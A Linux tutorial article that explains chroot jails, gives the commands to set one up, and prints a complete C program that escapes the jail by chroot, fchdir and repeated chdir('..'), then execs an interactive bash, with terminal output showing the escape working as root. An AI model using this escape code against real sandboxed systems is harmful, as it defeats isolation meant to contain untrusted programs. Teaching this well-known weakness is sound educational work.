This article introduces the concept of the chroot jail, presents a simple method of how to create one and a simple method of how to breaking one.
The concept of chroot jail
chroot() is a Unix system call that is often used to provide an additional layer of security when untrusted programs are run. The kernel on Unix varients which support chroot()maintain a note of the root directory each process on the system has. Generally this is "/", but the chroot() system call can change this. When chroot()is successfully called, the calling process has its idea of the root directory changed to the directory given as the argument to chroot(). For example after the following line of code, the process would see the directory "/foo/bar" as its root directory.
chdir("/foo/bar");
chroot("/foo/bar");
How to create a chroot jail
One thing should be noted here. chroot command in Linux is not the same as the chroot() system call. By default, chroot command will execute the same shell as the current shell when changing root directory. And if it fails to execute the shell, the command fails and the root directory is not changed.
So in order to properly create a chroot jail using chroot command, we need to set up some basic environment first. This includes the API filesystems (proc, sys, dev) and the shell binary and libraries it refers.
mkdir /foo/bar
cd /foo/bar
# copy /bin/sh and the libraries it refers to /foo/bar/bin and /foo/bar/lib
# use ldd command to see which libraries /bin/sh refers to.
mount -t proc proc ./proc
mount -t sysfs sys ./sys
mount -o bind /dev/ ./dev
chroot .
After these steps, a chroot jail is created. Try 'bash' command and it is expected to fail as there's no /bin/bash in the current root directory.
How to break out of a chroot jail
chroot actually does nothing more than changing an ingredient in path resolution. So it is possible to break out of the chroot jail. The key is to use relative path instead of absolute path.
For a user to break out of a chroot jail, he must have access to:
1. C compiler or a perl/python interpreter
2. security holes to gain root access
Following is a sample code in C which show how to break out of a chroot jail.
/* This program breaks a chroot jail and execute a bash interpreter. */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#define TEMP_DIR "foo"
int main() {
printf("Breaking out of a chroot jail!\n");
int i;
int dir_fd;
struct stat sbuf;
/* First we create the temporary directory if it doesn't exit. */
if (stat(TEMP_DIR, &sbuf)<0) {
if (errno == ENOENT) {
if (mkdir(TEMP_DIR, 0755)<0) {
fprintf(stderr, "Failed to create %s - %s\n",
TEMP_DIR, strerror(errno));
exit(1);
}
} else {
fprintf(stderr, "Failed to stat %s - %s\n",
TEMP_DIR, strerror(errno));
exit(1);
}
} else if (!S_ISDIR(sbuf.st_mode)) {
fprintf(stderr, "Error - %s is not a directory!\n", TEMP_DIR);
exit(1);
}
/* open the current working directory */
if ((dir_fd=open(".", O_RDONLY))<0) {
fprintf(stderr, "Failed to open \".\" for reading - %s\n",
strerror(errno));
exit(1);
}
/* chroot to the temporary directory. This ensure chdir("..") has
real effect and can reach the real root directory. */
if (chroot(TEMP_DIR)<0) {
fprintf(stderr, "Failed to chroot to %s - %s\n", TEMP_DIR,
strerror(errno));
exit(1);
}
/* Partially break out of the chroot jail by doing an fchdir()
This only partially breaks out of the chroot() jail since whilst
our current working directory is outside the chroot jail, our
root directory is still within it. Thus anything which refers to
"/" will refer to files under the chroot point.
*/
if (fchdir(dir_fd)<0) {
fprintf(stderr, "Failed to fchdir - %s\n",
strerror(errno));
exit(1);
}
close(dir_fd);
/* Completely break out the chroot jail by recursing up the directory
tree and doing a chroot to the current working directory (which will
be the real "/" at that point). We do this by chdir("..") lots of
times.
*/
for (i=0; i<1024; i++) {
chdir("..");
}
chroot(".");
/* exec a bash in interactive mode */
if (execl("/bin/bash", "-i", NULL)<0) {
fprintf(stderr, "Failed to exec - %s\n", strerror(errno));
exit(1);
}
return 0;
}
Running the compiled target in the chroot jail environment:
root@qemux86:~/test-chroot# chroot .
I have no name!@qemux86:/# ls
bin break.out dev lib proc sys
I have no name!@qemux86:/# ./break.out
Breaking out of a chroot jail!
root@qemux86:/# ls
bin dev home lost+found mnt proc sbin tmp var
boot etc lib media opt run sys usr